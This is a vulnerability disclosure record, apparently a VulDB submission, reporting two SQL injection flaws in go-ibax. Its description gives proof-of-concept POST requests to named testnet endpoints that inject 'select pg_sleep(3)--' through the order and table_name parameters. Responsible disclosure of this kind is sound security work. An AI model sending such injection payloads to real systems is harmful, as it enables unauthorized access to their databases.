| Title | SQL Injection vulnerabilities in go-ibax via order,table_name parameter |
|---|
| Description | There are two SQL injection vulnerabilities.
POC:
POST https://testnet-hk1.ibax.network:5079/api/v2/open/tablesInfo
data: page=1&limit=1&order=1; select pg_sleep(3)--
POC:
POST https://testnet-hk1.ibax.network:5079/api/v2/open/columnsInfo
data: table_name=1; select pg_sleep(3)--

Reported by Tom(@Tomy) from QSec-Team of Cyber Security Department at Qi'anxin Group on 2022-11-01 |
|---|
| Source | https://github.com/IBAX-io/go-ibax/issues/2060 |
|---|
| User | Tomy (UID 34751) |
|---|
| Submission | 01/11/2022 12:36 PM (4 years ago) |
|---|
| Moderation | 01/11/2022 04:38 PM (4 hours later) |
|---|
| Status | Accepted |
|---|
| VulDB Entry | 212634 [IBAX go-ibax /api/v2/open/tablesInfo SQL injection] |
|---|
| Points | 20 |
|---|